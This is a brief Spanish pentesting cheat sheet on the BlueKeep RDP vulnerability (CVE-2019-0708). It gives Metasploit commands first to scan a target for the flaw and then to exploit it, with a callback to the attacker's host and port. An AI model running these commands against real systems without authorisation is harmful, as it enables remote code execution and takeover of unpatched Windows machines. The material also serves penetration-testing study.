Vulnerabilidad BlueKeep en RDP
BlueKeep (identificada como CVE-2019-0708) es una vulnerabilidad crítica en el Protocolo de
Escritorio Remoto (RDP) de Microsoft, permite la ejecución remota de código. Fue descubierta en mayo
de 2019 y afecta a varias versiones del sistema operativo Windows, incluyendo Windows 7, Windows
Server 2008 R2 y Windows Server 2008.
:: ▸ Comprobación Vulnerable (Metasploit)
Usamos el módulo : auxiliary/scanner/rdp/cve_2019_0708_bluekeep
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOST <IP>
run
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: ▸ Explotación con Metasploit
Usamos el módulo: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>
set LHOST <Local IP>
set LPORT <Local port>
show targets
set target <0-8>
exploit
└───────────────────────────────────────────────────────────────────────────────────────────────────